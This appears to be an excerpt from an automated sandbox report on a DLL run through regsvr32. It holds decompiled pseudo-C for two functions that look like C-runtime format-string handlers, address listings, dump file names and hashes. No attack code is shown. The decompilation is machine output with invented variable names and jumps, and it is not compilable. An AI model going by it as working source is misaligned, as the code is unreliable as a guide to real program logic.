				_t305 = _t304 - 0x50;
				_t256 =  *0x80070098; // 0xde2ac6aee6eb
				_v56 = _t256 ^ _t305;
				_t124 =  *(__rcx + 0x3a) & 0x0000ffff;
				_t274 = __rcx;
				_t6 = _t298 - 0x20; // 0x58
				_t188 = _t6;
				_t7 = _t298 - 0x77; // 0x1
				r12d = _t7;
				_t195 = _t124 - 0x64;
				if (_t195 > 0) goto 0x8002e4d6;
				if (_t195 == 0) goto 0x8002e547;
				if (_t124 == 0x41) goto 0x8002e554;
				if (_t124 == 0x43) goto 0x8002e4b3;
				if (_t124 - 0x44 <= 0) goto 0x8002e55f;
				if (_t124 - 0x47 <= 0) goto 0x8002e554;
				if (_t124 == 0x53) goto 0x8002e509;
				if (_t124 == _t188) goto 0x8002e4c9;
				if (_t124 == 0x5a) goto 0x8002e4bf;
				if (_t124 == 0x61) goto 0x8002e554;
				if (_t124 != 0x63) goto 0x8002e55f;
				0x80031990();
				goto 0x8002e559;
				_t125 = E0000000118002F280(_t163, __rcx, __rcx, __rsi);
				goto 0x8002e559;
				0x8001f93c();
				goto 0x8002e559;
				if (_t125 - 0x67 <= 0) goto 0x8002e554;
				if (_t125 == 0x69) goto 0x8002e547;
				if (_t125 == 0x6e) goto 0x8002e540;
				if (_t125 == 0x6f) goto 0x8002e520;
				if (_t125 == 0x70) goto 0x8002e510;
				if (_t125 == 0x73) goto 0x8002e509;
				if (_t125 == 0x75) goto 0x8002e54b;
				if (_t125 != 0x78) goto 0x8002e55f;
				goto 0x8002e4cc;
				E00000001180032D84(__rcx, __rcx, _t300, __rbp, _t314);
				goto 0x8002e559;
				 *((intOrPtr*)(_t276 + 0x30)) = 0x10;
				 *((intOrPtr*)(_t276 + 0x34)) = 0xb;
				goto 0x8002e4c9;
				_t164 =  *(_t276 + 0x28);
				if ((r12b & _t164 >> 0x00000005) == 0) goto 0x8002e534;
				asm("bts ecx, 0x7");
				 *(_t274 + 0x28) = _t164;
				_t277 = _t274;
				E0000000118001C92C(0, _t274, _t277, _t300, __rbp);
				goto 0x8002e559;
				E00000001180032360(_t274, _t277);
				goto 0x8002e559;
				 *(_t277 + 0x28) =  *(_t277 + 0x28) | 0x00000010;
				E0000000118001E134(0, _t274, _t277, _t300, _t302);
				goto 0x8002e559;
				if (E00000001180030D6C(0, 0x78, _t274, _t277, _t302) != 0) goto 0x8002e566;
				goto 0x8002e851;
				if ( *((intOrPtr*)(_t274 + 0x38)) != bpl) goto 0x8002e84e;
				_t165 =  *(_t274 + 0x28);
				_v68 = 0;
				_v64 = 0;
				r13d = 0x20;
				if ((r12b & 0) == 0) goto 0x8002e5c4;
				if ((r12b & 0) == 0) goto 0x8002e5a6;
				_v68 = _t317 + 0xd;
				goto 0x8002e5c1;
				if ((r12b & _t165) == 0) goto 0x8002e5b2;
				goto 0x8002e59f;
				if ((r12b & 0) == 0) goto 0x8002e5c4;
				_v68 = r13w;
				_t291 = _t316;
				r8d =  *(_t274 + 0x3a) & 0x0000ffff;
				r10d = 0xffdf;
				if ((r10w & (r8w & 0xffffffff) - _t188) != 0) goto 0x8002e5e9;
				r9b = r12b;
				if ((r12b & 0) != 0) goto 0x8002e5ec;
				r9b = bpl;
				r15d = 0x30;
				if (r9b != 0) goto 0x8002e606;
				if (0 == 0) goto 0x8002e625;
				 *((intOrPtr*)(_t305 + 0x34 + _t291 * 2)) = r15w;
				if (r8w == _t188) goto 0x8002e619;
				if (r8w != 0x41) goto 0x8002e61c;
				 *((short*)(_t305 + 0x36 + _t291 * 2)) = _t188 & 0x0000ffff;
				_t191 =  *((intOrPtr*)(_t274 + 0x2c)) -  *(_t274 + 0x48);
				if ((_t165 & 0x0000000c) != 0) goto 0x8002e692;
				r9d = 0;
				if (_t191 <= 0) goto 0x8002e692;
				_t308 =  *((intOrPtr*)(_t274 + 0x460));
				if ( *((intOrPtr*)(_t308 + 0x10)) !=  *((intOrPtr*)(_t308 + 8))) goto 0x8002e65f;
				if ( *((intOrPtr*)(_t308 + 0x18)) == bpl) goto 0x8002e657;
				goto 0x8002e65a;
				 *(_t274 + 0x20) =  *(_t274 + 0x20) + 0x00000001 | 0xffffffff;
				goto 0x8002e685;
				 *(_t274 + 0x20) = _t277 + 1;
				 *((intOrPtr*)(_t308 + 0x10)) =  *((intOrPtr*)(_t308 + 0x10)) + _t316;
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t274 + 0x460)))))) = r13w;
				 *((long long*)( *((intOrPtr*)(_t274 + 0x460)))) =  *((long long*)( *((intOrPtr*)(_t274 + 0x460)))) + 2;
				if ( *(_t274 + 0x20) == 0xffffffff) goto 0x8002e692;
				r9d = r9d + r12d;
				if (r9d - _t191 < 0) goto 0x8002e63c;
				_t299 = _t274 + 0x20;
				r8d = 0;
				_v88 =  *((intOrPtr*)(_t274 + 8));
				_t319 = _t274 + 0x460;
				_t279 = _t319;
				E00000001180036148(_t277 + 1, _t191, _t274, _t279, _t300, _t302, _t299);
				if ((r12b & 0) == 0) goto 0x8002e71e;
				if ((r12b &  *(_t274 + 0x28) >> 0x00000002) != 0) goto 0x8002e71e;
				r8d = 0;
				if (_t191 <= 0) goto 0x8002e71e;
				_t294 =  *_t319;
				if ( *((intOrPtr*)(_t294 + 0x10)) !=  *((intOrPtr*)(_t294 + 8))) goto 0x8002e6f5;
				if ( *((intOrPtr*)(_t294 + 0x18)) == bpl) goto 0x8002e6ee;
				goto 0x8002e6f1;
				 *_t299 =  *_t299 + 0x00000001 | 0xffffffff;
				goto 0x8002e711;
				 *_t299 = _t279 + 1;
				 *((intOrPtr*)(_t294 + 0x10)) =  *((intOrPtr*)(_t294 + 0x10)) + _t316;
				 *((intOrPtr*)( *((intOrPtr*)( *_t319)))) = r15w;
				 *((long long*)( *_t319)) =  *((long long*)( *_t319)) + 2;
				if ( *_t299 == 0xffffffff) goto 0x8002e71e;
				r8d = r8d + r12d;
				if (r8d - _t191 < 0) goto 0x8002e6d7;
				if ( *((intOrPtr*)(_t274 + 0x4c)) != bpl) goto 0x8002e800;
				if ( *(_t274 + 0x48) <= 0) goto 0x8002e800;
				if ( *((intOrPtr*)( *((intOrPtr*)(_t274 + 8)) + 0x28)) != bpl) goto 0x8002e748;
				0x800338e0();
				r9d = 0;
				if ( *(_t274 + 0x48) == 0) goto 0x8002e7c5;
				_v72 = r9w;
				_t156 = E00000001180040E3C( *_t299, 0, _t274,  &_v72,  *((intOrPtr*)(_t274 + 0x40)), _t299, _t300, _t302,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t274 + 8)) + 0x18)) + 8)),  *((intOrPtr*)(_t274 + 8)));
				r9d = 0;
				if (_t156 <= 0) goto 0x8002e7fa;
				_t283 =  *_t319;
				if ( *((intOrPtr*)(_t283 + 0x10)) !=  *((intOrPtr*)(_t283 + 8))) goto 0x8002e7a0;
				if ( *((intOrPtr*)(_t283 + 0x18)) == r9b) goto 0x8002e79a;
				 *(_t274 + 0x20) =  *(_t274 + 0x20) + r12d;
				goto 0x8002e7b8;
				 *(_t274 + 0x20) =  *(_t274 + 0x20) | 0xffffffff;
				goto 0x8002e7b8;
				 *(_t274 + 0x20) =  *(_t274 + 0x20) + r12d;
				 *((intOrPtr*)(_t283 + 0x10)) =  *((intOrPtr*)(_t283 + 0x10)) + _t316;
				 *((short*)( *((intOrPtr*)( *_t319)))) = _v72 & 0x0000ffff;
				 *((long long*)( *_t319)) =  *((long long*)( *_t319)) + 2;
				if (0 + r12d !=  *(_t274 + 0x48)) goto 0x8002e753;
				r13d = 0x20;
				_t176 =  *_t299;
				if (_t176 < 0) goto 0x8002e84e;
				if ((r12b & 0) == 0) goto 0x8002e84e;
				r8d = 0;
				if (_t191 <= 0) goto 0x8002e84e;
				_t296 =  *_t319;
				if ( *((intOrPtr*)(_t296 + 0x10)) !=  *((intOrPtr*)(_t296 + 8))) goto 0x8002e825;
				if ( *((intOrPtr*)(_t296 + 0x18)) == bpl) goto 0x8002e81e;
				goto 0x8002e821;
				 *(_t274 + 0x20) =  *(_t274 + 0x20) | 0xffffffff;
				goto 0x8002e7c3;
				r8d =  *(_t274 + 0x48);
				_t285 = _t319;
				_v88 =  *((intOrPtr*)(_t274 + 8));
				E00000001180036148( *(_t274 + 0x28) >> 2, _t191, _t274, _t285, _t300, _t302, _t299);
				goto 0x8002e7cb;
				 *_t299 = _t176 + 0x00000001 | 0xffffffff;
				goto 0x8002e841;
				 *_t299 = _t285 + 1;
				 *((intOrPtr*)( *((intOrPtr*)(_t274 + 0x40)) + 0x10)) =  *((intOrPtr*)( *((intOrPtr*)(_t274 + 0x40)) + 0x10)) + _t316;
				 *((intOrPtr*)( *((intOrPtr*)( *_t319)))) = r13w;
				 *((long long*)( *_t319)) =  *((long long*)( *_t319)) + 2;
				if ( *_t299 == 0xffffffff) goto 0x8002e84e;
				r8d = r8d + r12d;
				if (r8d - _t191 < 0) goto 0x8002e7e3;
				return E000000011800028F0(r12b,  *_t299, _v56 ^ _t305);
			}








































                                                                                                              0x18002e420
                                                                                                              0x18002e420
                                                                                                              0x18002e420
                                                                                                              0x18002e420
                                                                                                              0x18002e425
                                                                                                              0x18002e42a
                                                                                                              0x18002e438
                                                                                                              0x18002e43c
                                                                                                              0x18002e446
                                                                                                              0x18002e44b
                                                                                                              0x18002e454
                                                                                                              0x18002e457
                                                                                                              0x18002e457
                                                                                                              0x18002e45a
                                                                                                              0x18002e45a
                                                                                                              0x18002e45e
                                                                                                              0x18002e462
                                                                                                              0x18002e464
                                                                                                              0x18002e46e
                                                                                                              0x18002e478
                                                                                                              0x18002e47e
                                                                                                              0x18002e488
                                                                                                              0x18002e492
                                                                                                              0x18002e497
                                                                                                              0x18002e49d
                                                                                                              0x18002e4a3
                                                                                                              0x18002e4ad
                                                                                                              0x18002e4b5
                                                                                                              0x18002e4ba
                                                                                                              0x18002e4bf
                                                                                                              0x18002e4c4
                                                                                                              0x18002e4cc
                                                                                                              0x18002e4d1
                                                                                                              0x18002e4da
                                                                                                              0x18002e4e0
                                                                                                              0x18002e4e6
                                                                                                              0x18002e4ec
                                                                                                              0x18002e4f2
                                                                                                              0x18002e4f8
                                                                                                              0x18002e4fe
                                                                                                              0x18002e503
                                                                                                              0x18002e507
                                                                                                              0x18002e509
                                                                                                              0x18002e50e
                                                                                                              0x18002e510
                                                                                                              0x18002e517
                                                                                                              0x18002e51e
                                                                                                              0x18002e520
                                                                                                              0x18002e52b
                                                                                                              0x18002e52d
                                                                                                              0x18002e531
                                                                                                              0x18002e536
                                                                                                              0x18002e539
                                                                                                              0x18002e53e
                                                                                                              0x18002e540
                                                                                                              0x18002e545
                                                                                                              0x18002e547
                                                                                                              0x18002e54d
                                                                                                              0x18002e552
                                                                                                              0x18002e55d
                                                                                                              0x18002e561
                                                                                                              0x18002e56a
                                                                                                              0x18002e570
                                                                                                              0x18002e575
                                                                                                              0x18002e57c
                                                                                                              0x18002e581
                                                                                                              0x18002e58f
                                                                                                              0x18002e599
                                                                                                              0x18002e59f
                                                                                                              0x18002e5a4
                                                                                                              0x18002e5a9
                                                                                                              0x18002e5b0
                                                                                                              0x18002e5b9
                                                                                                              0x18002e5bb
                                                                                                              0x18002e5c1
                                                                                                              0x18002e5c4
                                                                                                              0x18002e5c9
                                                                                                              0x18002e5da
                                                                                                              0x18002e5de
                                                                                                              0x18002e5e7
                                                                                                              0x18002e5e9
                                                                                                              0x18002e5f0
                                                                                                              0x18002e600
                                                                                                              0x18002e604
                                                                                                              0x18002e606
                                                                                                              0x18002e610
                                                                                                              0x18002e617
                                                                                                              0x18002e61c
                                                                                                              0x18002e62a
                                                                                                              0x18002e630
                                                                                                              0x18002e632
                                                                                                              0x18002e637
                                                                                                              0x18002e63c
                                                                                                              0x18002e64b
                                                                                                              0x18002e651
                                                                                                              0x18002e655
                                                                                                              0x18002e65a
                                                                                                              0x18002e65d
                                                                                                              0x18002e662
                                                                                                              0x18002e665
                                                                                                              0x18002e673
                                                                                                              0x18002e67e
                                                                                                              0x18002e688
                                                                                                              0x18002e68a
                                                                                                              0x18002e690
                                                                                                              0x18002e696
                                                                                                              0x18002e69a
                                                                                                              0x18002e69d
                                                                                                              0x18002e6a2
                                                                                                              0x18002e6ac
                                                                                                              0x18002e6b4
                                                                                                              0x18002e6c4
                                                                                                              0x18002e6cc
                                                                                                              0x18002e6ce
                                                                                                              0x18002e6d3
                                                                                                              0x18002e6d7
                                                                                                              0x18002e6e2
                                                                                                              0x18002e6e8
                                                                                                              0x18002e6ec
                                                                                                              0x18002e6f1
                                                                                                              0x18002e6f3
                                                                                                              0x18002e6f8
                                                                                                              0x18002e6fa
                                                                                                              0x18002e704
                                                                                                              0x18002e70b
                                                                                                              0x18002e714
                                                                                                              0x18002e716
                                                                                                              0x18002e71c
                                                                                                              0x18002e722
                                                                                                              0x18002e72d
                                                                                                              0x18002e73b
                                                                                                              0x18002e740
                                                                                                              0x18002e74c
                                                                                                              0x18002e751
                                                                                                              0x18002e75c
                                                                                                              0x18002e76d
                                                                                                              0x18002e772
                                                                                                              0x18002e77a
                                                                                                              0x18002e77c
                                                                                                              0x18002e78c
                                                                                                              0x18002e792
                                                                                                              0x18002e794
                                                                                                              0x18002e798
                                                                                                              0x18002e79a
                                                                                                              0x18002e79e
                                                                                                              0x18002e7a0
                                                                                                              0x18002e7a4
                                                                                                              0x18002e7ae
                                                                                                              0x18002e7b4
                                                                                                              0x18002e7c1
                                                                                                              0x18002e7c5
                                                                                                              0x18002e7cb
                                                                                                              0x18002e7cf
                                                                                                              0x18002e7da
                                                                                                              0x18002e7dc
                                                                                                              0x18002e7e1
                                                                                                              0x18002e7e3
                                                                                                              0x18002e7ee
                                                                                                              0x18002e7f4
                                                                                                              0x18002e7f8
                                                                                                              0x18002e7fa
                                                                                                              0x18002e7fe
                                                                                                              0x18002e807
                                                                                                              0x18002e80b
                                                                                                              0x18002e812
                                                                                                              0x18002e817
                                                                                                              0x18002e81c
                                                                                                              0x18002e821
                                                                                                              0x18002e823
                                                                                                              0x18002e828
                                                                                                              0x18002e82a
                                                                                                              0x18002e834
                                                                                                              0x18002e83b
                                                                                                              0x18002e844
                                                                                                              0x18002e846
                                                                                                              0x18002e84c
                                                                                                              0x18002e87b

                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b9ef2e2fb4b5329e75682cb22a7e02ab59d0d9f5e99b726f6190079aa1a73f9f
                                                                                                              • Instruction ID: fed3fc60cb786a46d20a7aa39acdeabb0ecaf67690b0b66671004dd5be242551
                                                                                                              • Opcode Fuzzy Hash: b9ef2e2fb4b5329e75682cb22a7e02ab59d0d9f5e99b726f6190079aa1a73f9f
                                                                                                              • Instruction Fuzzy Hash: 6AD1AF76654A9982EBAB8F1980407AD37A0F70ABC8F54D216FE4D473D4EF35CA5AC340
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 000000018002C51C Relevance: .3, Instructions: 321COMMONCrypto
                                                                                                              Download Yara Rule
                                                                                                              C-Code - Quality: 30%
                                                                                                              			E0000000118002C51C(void* __edi, void* __esi, long long __rbx, long long __rcx, void* __rdx, long long __rdi, long long __rsi, void* __r8, long long _a16, long long _a24, long long _a32) {
				void* _v40;
				signed int _v56;
				char _v68;
				char _v70;
				signed int _v72;
				long long _v88;
				void* __rbp;
				intOrPtr _t110;
				void* _t113;
				void* _t117;
				void* _t139;
				unsigned int _t146;
				signed char _t147;
				unsigned int _t152;
				signed int _t158;
				void* _t168;
				void* _t172;
				void* _t173;
				signed long long _t233;
				long long _t249;
				intOrPtr* _t254;
				intOrPtr* _t258;
				void* _t263;
				intOrPtr _t266;
				intOrPtr _t270;
				signed int* _t272;
				void* _t276;
				void* _t277;
				void* _t280;
				intOrPtr _t281;
				void* _t285;
				void* _t289;
				intOrPtr* _t290;

				_t280 = __r8;
				_t274 = __rsi;
				_t271 = __rdi;
				_t168 = __edi;
				_a16 = __rbx;
				_a24 = __rsi;
				_a32 = __rdi;
				_t276 = _t277;
				_t233 =  *0x80070098; // 0xde2ac6aee6eb
				_v56 = _t233 ^ _t277 - 0x00000050;
				_t110 =  *((intOrPtr*)(__rcx + 0x39));
				_t249 = __rcx;
				r13d = 1;
				dil = 0x78;
				sil = 0x58;
				r14b = 0x41;
				_t173 = _t110 - 0x64;
				if (_t173 > 0) goto 0x8002c5bf;
				if (_t173 == 0) goto 0x8002c622;
				if (_t110 == r14b) goto 0x8002c62f;
				if (_t110 == 0x43) goto 0x8002c5a2;
				if (_t110 - 0x44 <= 0) goto 0x8002c638;
				if (_t110 - 0x47 <= 0) goto 0x8002c62f;
				if (_t110 == 0x53) goto 0x8002c5e4;
				if (_t110 == sil) goto 0x8002c5b5;
				if (_t110 == 0x5a) goto 0x8002c5ae;
				if (_t110 == 0x61) goto 0x8002c62f;
				if (_t110 != 0x63) goto 0x8002c638;
				E00000001180031384(_t110, _t110 - 0x63, __rcx, __rcx);
				goto 0x8002c634;
				E0000000118002EEBC(_t110 - 0x63, __rcx);
				goto 0x8002c634;
				_t113 = E0000000118001EB04(r13b, __esi, __rcx, __rcx, __rdi, __rsi, _t280);
				goto 0x8002c634;
				if (_t113 - 0x67 <= 0) goto 0x8002c62f;
				if (_t113 == 0x69) goto 0x8002c622;
				if (_t113 == 0x6e) goto 0x8002c61b;
				if (_t113 == 0x6f) goto 0x8002c5fb;
				if (_t113 == 0x70) goto 0x8002c5eb;
				if (_t113 == 0x73) goto 0x8002c5e4;
				if (_t113 == 0x75) goto 0x8002c626;
				if (_t113 != dil) goto 0x8002c638;
				goto 0x8002c5b8;
				E00000001180032904(0, _t113 - dil, __rcx, __rcx, _t276, _t285);
				goto 0x8002c634;
				 *((intOrPtr*)(__rcx + 0x30)) = 0x10;
				 *((intOrPtr*)(__rcx + 0x34)) = 0xb;
				goto 0x8002c5b5;
				_t146 =  *(__rcx + 0x28);
				if ((r13b & _t146 >> 0x00000005) == 0) goto 0x8002c60f;
				asm("bts ecx, 0x7");
				 *(__rcx + 0x28) = _t146;
				0x8001baf4();
				goto 0x8002c634;
				0x80031de4();
				goto 0x8002c634;
				 *(__rcx + 0x28) =  *(__rcx + 0x28) | 0x00000010;
				_t117 = E0000000118001D2FC(0, __esi, __rcx, __rcx, _t271, _t274, _t280);
				goto 0x8002c634;
				0x8002fc5c();
				if (_t117 != 0) goto 0x8002c63f;
				goto 0x8002c8d4;
				if ( *((intOrPtr*)(__rcx + 0x474)) != 2) goto 0x8002c655;
				if ( *((intOrPtr*)(__rcx + 0x470)) == r13d) goto 0x8002c8d1;
				if ( *((char*)(__rcx + 0x38)) != 0) goto 0x8002c8d1;
				_t147 =  *(__rcx + 0x28);
				_v72 = 0;
				_v70 = 0;
				if ((r13b & 0) == 0) goto 0x8002c6a2;
				if ((r13b & 0) == 0) goto 0x8002c687;
				_v72 = 0x2d;
				goto 0x8002c69f;
				if ((r13b & _t147) == 0) goto 0x8002c692;
				_v72 = 0x2b;
				goto 0x8002c69f;
				if ((r13b & 0) == 0) goto 0x8002c6a2;
				_v72 = 0x20;
				_t263 = _t289;
				r8b =  *((intOrPtr*)(__rcx + 0x39));
				if ((r8b - sil & 0x000000df) != 0) goto 0x8002c6bf;
				if ((r13b & _t147 >> 0x00000005) == 0) goto 0x8002c6bf;
				r9b = r13b;
				goto 0x8002c6c2;
				r9b = 0;
				if (r9b != 0) goto 0x8002c6d6;
				if ((r8b - r14b & 0xffffff00 | (r8b - r14b & 0x000000df) == 0x00000000) == 0) goto 0x8002c6f1;
				 *((char*)(_t276 + _t263 - 0x20)) = 0x30;
				if (r8b == sil) goto 0x8002c6e5;
				if (r8b != r14b) goto 0x8002c6e8;
				dil = sil;
				 *((intOrPtr*)(_t276 + _t263 - 0x1f)) = dil;
				_t172 =  *((intOrPtr*)(__rcx + 0x2c)) -  *((intOrPtr*)(__rcx + 0x48));
				if ((_t147 & 0x0000000c) != 0) goto 0x8002c75d;
				r9d = 0;
				if (_t172 <= 0) goto 0x8002c75d;
				_t281 =  *((intOrPtr*)(__rcx + 0x460));
				if ( *((intOrPtr*)(_t281 + 0x10)) !=  *((intOrPtr*)(_t281 + 8))) goto 0x8002c72c;
				if ( *((char*)(_t281 + 0x18)) == 0) goto 0x8002c724;
				goto 0x8002c727;
				 *(__rcx + 0x20) =  *(__rcx + 0x20) + 0x00000001 | 0xffffffff;
				goto 0x8002c750;
				 *(__rcx + 0x20) = __rcx + 1;
				 *((intOrPtr*)(_t281 + 0x10)) =  *((intOrPtr*)(_t281 + 0x10)) + _t289;
				 *((char*)( *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x460)))))) = 0x20;
				 *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x460)))) =  *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x460)))) + _t289;
				if ( *(__rcx + 0x20) == 0xffffffff) goto 0x8002c75d;
				r9d = r9d + r13d;
				if (r9d - _t172 < 0) goto 0x8002c708;
				_t62 = _t249 + 0x20; // 0x98
				_t272 = _t62;
				r8d = 0;
				_v88 =  *((intOrPtr*)(__rcx + 8));
				_t64 = _t249 + 0x460; // 0x4d8
				_t290 = _t64;
				_t254 = _t290;
				E000000011800360A4(__rcx + 1, _t168, _t172, __rcx, _t254, _t272, _t274, _t276, _t272);
				_t152 =  *(__rcx + 0x28);
				if ((r13b & _t152 >> 0x00000003) == 0) goto 0x8002c7e6;
				if ((r13b & _t152 >> 0x00000002) != 0) goto 0x8002c7e6;
				r8d = 0;
				if (_t172 <= 0) goto 0x8002c7e6;
				_t266 =  *_t290;
				if ( *((intOrPtr*)(_t266 + 0x10)) !=  *((intOrPtr*)(_t266 + 8))) goto 0x8002c7bf;
				if ( *((char*)(_t266 + 0x18)) == 0) goto 0x8002c7b8;
				goto 0x8002c7bb;
				 *_t272 =  *_t272 + 0x00000001 | 0xffffffff;
				goto 0x8002c7d9;
				 *_t272 = _t254 + 1;
				 *((intOrPtr*)(_t266 + 0x10)) =  *((intOrPtr*)(_t266 + 0x10)) + _t289;
				 *((char*)( *((intOrPtr*)( *_t290)))) = 0x30;
				 *((intOrPtr*)( *_t290)) =  *((intOrPtr*)( *_t290)) + _t289;
				if ( *_t272 == 0xffffffff) goto 0x8002c7e6;
				r8d = r8d + r13d;
				if (r8d - _t172 < 0) goto 0x8002c7a1;
				if ( *((char*)(__rcx + 0x4c)) == 0) goto 0x8002c858;
				if ( *((intOrPtr*)(__rcx + 0x48)) <= 0) goto 0x8002c858;
				r14d = 0;
				_t81 =  &_v68; // -27
				r9d =  *( *(__rcx + 0x40)) & 0x0000ffff;
				_t82 =  &_v72; // -31
				_v72 = _v72 & 0x00000000;
				r8d = 6;
				_v88 =  *((intOrPtr*)(__rcx + 8));
				if (E00000001180040970(__rcx, _t82, _t81, _t276, _t281) != 0) goto 0x8002c853;
				r8d = _v72;
				if (r8d == 0) goto 0x8002c853;
				_v88 =  *((intOrPtr*)(_t249 + 8));
				_t139 = E000000011800360A4(_t138, _t168, _t172, _t249, _t290, _t272, _t274, _t276, _t272);
				r14d = r14d + r13d;
				if (r14d !=  *(_t249 + 0x48)) goto 0x8002c7f9;
				goto 0x8002c874;
				 *_t272 =  *_t272 | 0xffffffff;
				goto 0x8002c874;
				r8d =  *(_t249 + 0x48);
				_t258 = _t290;
				_v88 =  *((intOrPtr*)(_t249 + 8));
				E000000011800360A4(_t139, _t168, _t172, _t249, _t258, _t272, _t274, _t276, _t272);
				_t158 =  *_t272;
				if (_t158 < 0) goto 0x8002c8d1;
				if ((r13b &  *(_t249 + 0x28) >> 0x00000002) == 0) goto 0x8002c8d1;
				r8d = 0;
				if (_t172 <= 0) goto 0x8002c8d1;
				_t270 =  *_t290;
				if ( *((intOrPtr*)(_t270 + 0x10)) !=  *((intOrPtr*)(_t270 + 8))) goto 0x8002c8aa;
				if ( *((char*)(_t270 + 0x18)) == 0) goto 0x8002c8a3;
				goto 0x8002c8a6;
				 *_t272 = _t158 + 0x00000001 | 0xffffffff;
				goto 0x8002c8c4;
				 *_t272 = _t258 + 1;
				 *((intOrPtr*)(_t270 + 0x10)) =  *((intOrPtr*)(_t270 + 0x10)) + _t289;
				 *((char*)( *((intOrPtr*)( *_t290)))) = 0x20;
				 *((intOrPtr*)( *_t290)) =  *((intOrPtr*)( *_t290)) + _t289;
				if ( *_t272 == 0xffffffff) goto 0x8002c8d1;
				r8d = r8d + r13d;
				if (r8d - _t172 < 0) goto 0x8002c88c;
				return E000000011800028F0(r13b,  *_t272, _v56 ^ _t277 - 0x00000050);
			}




































                                                                                                              0x18002c51c
                                                                                                              0x18002c51c
                                                                                                              0x18002c51c
                                                                                                              0x18002c51c
                                                                                                              0x18002c51c
                                                                                                              0x18002c521
                                                                                                              0x18002c526
                                                                                                              0x18002c534
                                                                                                              0x18002c53b
                                                                                                              0x18002c545
                                                                                                              0x18002c549
                                                                                                              0x18002c54c
                                                                                                              0x18002c54f
                                                                                                              0x18002c555
                                                                                                              0x18002c558
                                                                                                              0x18002c55b
                                                                                                              0x18002c55e
                                                                                                              0x18002c560
                                                                                                              0x18002c562
                                                                                                              0x18002c56b
                                                                                                              0x18002c573
                                                                                                              0x18002c577
                                                                                                              0x18002c57f
                                                                                                              0x18002c587
                                                                                                              0x18002c58c
                                                                                                              0x18002c590
                                                                                                              0x18002c594
                                                                                                              0x18002c59c
                                                                                                              0x18002c5a4
                                                                                                              0x18002c5a9
                                                                                                              0x18002c5ae
                                                                                                              0x18002c5b3
                                                                                                              0x18002c5b8
                                                                                                              0x18002c5bd
                                                                                                              0x18002c5c1
                                                                                                              0x18002c5c5
                                                                                                              0x18002c5c9
                                                                                                              0x18002c5cd
                                                                                                              0x18002c5d1
                                                                                                              0x18002c5d5
                                                                                                              0x18002c5d9
                                                                                                              0x18002c5de
                                                                                                              0x18002c5e2
                                                                                                              0x18002c5e4
                                                                                                              0x18002c5e9
                                                                                                              0x18002c5eb
                                                                                                              0x18002c5f2
                                                                                                              0x18002c5f9
                                                                                                              0x18002c5fb
                                                                                                              0x18002c606
                                                                                                              0x18002c608
                                                                                                              0x18002c60c
                                                                                                              0x18002c614
                                                                                                              0x18002c619
                                                                                                              0x18002c61b
                                                                                                              0x18002c620
                                                                                                              0x18002c622
                                                                                                              0x18002c628
                                                                                                              0x18002c62d
                                                                                                              0x18002c62f
                                                                                                              0x18002c636
                                                                                                              0x18002c63a
                                                                                                              0x18002c646
                                                                                                              0x18002c64f
                                                                                                              0x18002c659
                                                                                                              0x18002c65f
                                                                                                              0x18002c664
                                                                                                              0x18002c66a
                                                                                                              0x18002c675
                                                                                                              0x18002c67f
                                                                                                              0x18002c681
                                                                                                              0x18002c685
                                                                                                              0x18002c68a
                                                                                                              0x18002c68c
                                                                                                              0x18002c690
                                                                                                              0x18002c699
                                                                                                              0x18002c69b
                                                                                                              0x18002c69f
                                                                                                              0x18002c6a2
                                                                                                              0x18002c6ae
                                                                                                              0x18002c6b8
                                                                                                              0x18002c6ba
                                                                                                              0x18002c6bd
                                                                                                              0x18002c6bf
                                                                                                              0x18002c6d0
                                                                                                              0x18002c6d4
                                                                                                              0x18002c6d6
                                                                                                              0x18002c6de
                                                                                                              0x18002c6e3
                                                                                                              0x18002c6e5
                                                                                                              0x18002c6e8
                                                                                                              0x18002c6f6
                                                                                                              0x18002c6fc
                                                                                                              0x18002c6fe
                                                                                                              0x18002c703
                                                                                                              0x18002c708
                                                                                                              0x18002c717
                                                                                                              0x18002c71e
                                                                                                              0x18002c722
                                                                                                              0x18002c727
                                                                                                              0x18002c72a
                                                                                                              0x18002c72f
                                                                                                              0x18002c732
                                                                                                              0x18002c740
                                                                                                              0x18002c74a
                                                                                                              0x18002c753
                                                                                                              0x18002c755
                                                                                                              0x18002c75b
                                                                                                              0x18002c761
                                                                                                              0x18002c761
                                                                                                              0x18002c765
                                                                                                              0x18002c768
                                                                                                              0x18002c76d
                                                                                                              0x18002c76d
                                                                                                              0x18002c777
                                                                                                              0x18002c77e
                                                                                                              0x18002c783
                                                                                                              0x18002c78e
                                                                                                              0x18002c796
                                                                                                              0x18002c798
                                                                                                              0x18002c79d
                                                                                                              0x18002c7a1
                                                                                                              0x18002c7ac
                                                                                                              0x18002c7b2
                                                                                                              0x18002c7b6
                                                                                                              0x18002c7bb
                                                                                                              0x18002c7bd
                                                                                                              0x18002c7c2
                                                                                                              0x18002c7c4
                                                                                                              0x18002c7ce
                                                                                                              0x18002c7d4
                                                                                                              0x18002c7dc
                                                                                                              0x18002c7de
                                                                                                              0x18002c7e4
                                                                                                              0x18002c7ea
                                                                                                              0x18002c7f0
                                                                                                              0x18002c7f6
                                                                                                              0x18002c7fd
                                                                                                              0x18002c801
                                                                                                              0x18002c806
                                                                                                              0x18002c80a
                                                                                                              0x18002c813
                                                                                                              0x18002c819
